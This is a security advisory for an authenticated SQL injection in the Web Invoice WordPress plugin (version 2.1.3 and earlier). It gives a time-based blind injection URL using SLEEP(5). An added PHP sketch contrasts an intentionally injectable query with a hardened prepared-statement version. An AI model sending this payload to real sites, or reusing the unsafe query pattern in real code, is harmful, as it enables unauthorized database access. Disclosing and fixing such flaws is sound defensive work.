Source: wpexploit | Author: Daniel Krohmer | WPEX-ID: 218F8015-E14B-46A8-889D-08B2B822F8AE
Published: Dec 12, 2022 - 12:00 a.m.

Web Invoice <= 2.1.3 - Authenticated SQLi

Tags: web invoice, authenticated, sql injection, unauthorized access, vulnerability

EPSS: 0.001 (Low) | EPSS Percentile: 43.0%

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL Injection exploitable by high-privilege users such as admin by default. However, depending on the plugin configuration, other users, such as subscribers, could exploit this as well.

When logged in as a user allowed to Manage invoice (admin by default, but this can be changed via the plugin's settings), open the following URL:

https://example.com/wp-admin/admin.php?page=new_web_invoice&multiple_invoices[]=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&multiple_invoices[]=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&web_invoice_action=clear_log
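To show where this class of defect lies and how it is fixed, here is an added, hypothetical sketch that is not the Web Invoice plugin's code: an `IN (...)` list built from the `multiple_invoices[]` array, first interpolated unsafely as the advisory describes, then with every element coerced to an integer and bound through `$wpdb->prepare()`. The table name, column name, capability and handler structure are placeholders; only the parameter name, page slug and action value come from the advisory.

```php
<?php
// Added, hypothetical illustration: NOT the Web Invoice plugin's code.
// Table/column names and the capability are placeholders; only the
// multiple_invoices[] parameter, page slug and action come from the advisory.

// --- Vulnerable pattern (the bug class the advisory describes) ---
// Array elements are joined straight into the SQL text, so an element such as
// "31618572 AND (SELECT ...)" becomes part of the statement instead of a value.
function wi_clear_log_vulnerable( wpdb $wpdb, array $ids ): int {
    $in = implode( ',', $ids );                          // no type check, no escaping
    return (int) $wpdb->query(
        "DELETE FROM {$wpdb->prefix}web_invoice_log WHERE invoice_id IN ($in)"
    );
}

// --- Hardened pattern ---
// 1. Gate the handler on a capability, not just on being logged in.
// 2. Coerce every element to a non-negative integer so it cannot carry SQL syntax.
// 3. Build one %d placeholder per value and bind them with $wpdb->prepare(), so
//    the statement's shape is fixed before any user data is added.
function wi_clear_log_hardened( wpdb $wpdb, array $ids ): int {
    if ( ! current_user_can( 'manage_options' ) ) {      // placeholder capability
        return 0;
    }
    $ids = array_filter( array_map( 'absint', $ids ) );  // "31618572 AND ..." -> 31618572
    if ( empty( $ids ) ) {
        return 0;
    }
    $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
    $sql = $wpdb->prepare(
        "DELETE FROM {$wpdb->prefix}web_invoice_log WHERE invoice_id IN ($placeholders)",
        ...array_values( $ids )
    );
    return (int) $wpdb->query( $sql );
}

// Placeholder request handler reached via admin.php?page=new_web_invoice
if ( isset( $_GET['web_invoice_action'] ) && 'clear_log' === $_GET['web_invoice_action'] ) {
    global $wpdb;
    $ids = isset( $_GET['multiple_invoices'] )
        ? (array) wp_unslash( $_GET['multiple_invoices'] )
        : array();
    wi_clear_log_hardened( $wpdb, $ids );
}
```

With the hardened version, the advisory's payload collapses to the integer 31618572 and the `SLEEP(5)` never reaches the database, which is also the quickest way to confirm a patched install: the request returns without the five-second delay.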

